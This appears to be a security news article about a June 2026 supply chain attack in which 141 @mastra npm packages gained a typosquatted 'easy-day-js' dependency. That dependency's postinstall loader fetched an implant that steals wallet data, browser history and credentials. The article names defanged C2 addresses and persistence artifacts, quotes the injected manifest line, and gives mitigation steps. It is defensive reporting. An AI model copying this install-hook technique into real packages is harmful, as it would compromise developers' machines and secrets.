Hackers Compromised 140+ Mastra npm Packages to Deploy Password-Stealing Malware

A sophisticated supply chain attack has targeted the Mastra-AI npm ecosystem, with researchers from Microsoft and Socket identifying over 141 compromised packages designed to silently deploy an infostealer payload on developer machines, CI/CD runners, and build environments.

The campaign, detected on June 17, 2026, exploited a typosquatting dependency to deliver multi-stage malware capable of stealing cryptocurrency wallet data, browser history, and sensitive credentials.

Between 01:15 and 02:36 UTC on June 17, a single npm account identified as ehindero mass-published malicious versions of 141 @mastra/* packages in a tight window.

Critically, the compromised package code itself was byte-for-byte identical to legitimate builds; the only change was a single injected dependency in each manifest:

json"easy-day-js": "^1.11.21"

easy-day-js is a deliberate typosquat of the popular dayjs library, published the day prior by a separate account (sergey2016). Version 1.11.21 was a clean copy of dayjs to establish a benign history.

Version 1.11.22, however, added a weaponized postinstall hook running node setup.cjs, executing the malicious payload automatically during npm install — before any developer imports or uses the package.

The affected packages include @mastra/core, which receives over 918,000 weekly npm downloads, giving this campaign a substantial potential blast radius.

Mastra npm Packages Compromise Chain

Stage 1 — The Loader (setup.cjs): Obfuscated using obfuscator.io, the loader disables TLS certificate verification (NODE_TLS_REJECT_UNAUTHORIZED=0), writes tracking files (~/.pkg_history, ~/.pkg_logs) to fingerprint the victim machine, fetches a second-stage payload from 23[.]254[.]164[.]92:8000/update/49890878, and spawns it as a detached, hidden background process pointing to C2 server 23[.]254[.]164[.]123:443. The loader then self-deletes to eliminate forensic traces.

Stage 2 — The Implant (protocal.cjs): A ~41 KB cross-platform Node.js tasking client, the implant installs login persistence across all major operating systems a Windows Registry Run key (NvmProtocal), a macOS LaunchAgent (com.nvm.protocal.plist), and a Linux systemd user unit (nvmconf.service). All persistence mechanisms are disguised as legitimate Node.js tooling to blend into developer environments.

Once persistent, the implant beacons to the operator’s C2 and awaits arbitrary follow-on commands. Built-in collection capabilities include inventorying 166 cryptocurrency wallet browser extensions (MetaMask, Phantom, Coinbase Wallet, Binance Wallet, TronLink, and others), exfiltrating Chrome, Edge, and Brave browser history via Node’s built-in SQLite module, and conducting host reconnaissance, including running processes and installed applications.

Mitigations

Any system that ran npm install on affected @mastra/* versions should be treated as compromised. Developers should immediately run npm ls easy-day-js to check for exposure, remove affected versions, and pin to mastra@1.13.0 using lockfiles.

Remove persistence artifacts manually from all affected platforms and rotate all credentials that may have been present in the installation environment including npm tokens, GitHub tokens, cloud provider keys, and CI/CD secrets.

For high-value cryptocurrency wallets, migrate funds to a new wallet generated from a fresh seed phrase on a clean device.

Going forward, organizations should run npm install --ignore-scripts by default in CI pipelines, enforce lockfiles, implement package cooldown periods for newly published versions, and monitor for outbound connections to raw IP addresses during build processes.

IoCs

Network Indicators

Code & String Indicators

CISO & Security Leaders: Your next breach may not have a face. Join ISC2’s LIVE webinar, “Ghost in the Machine”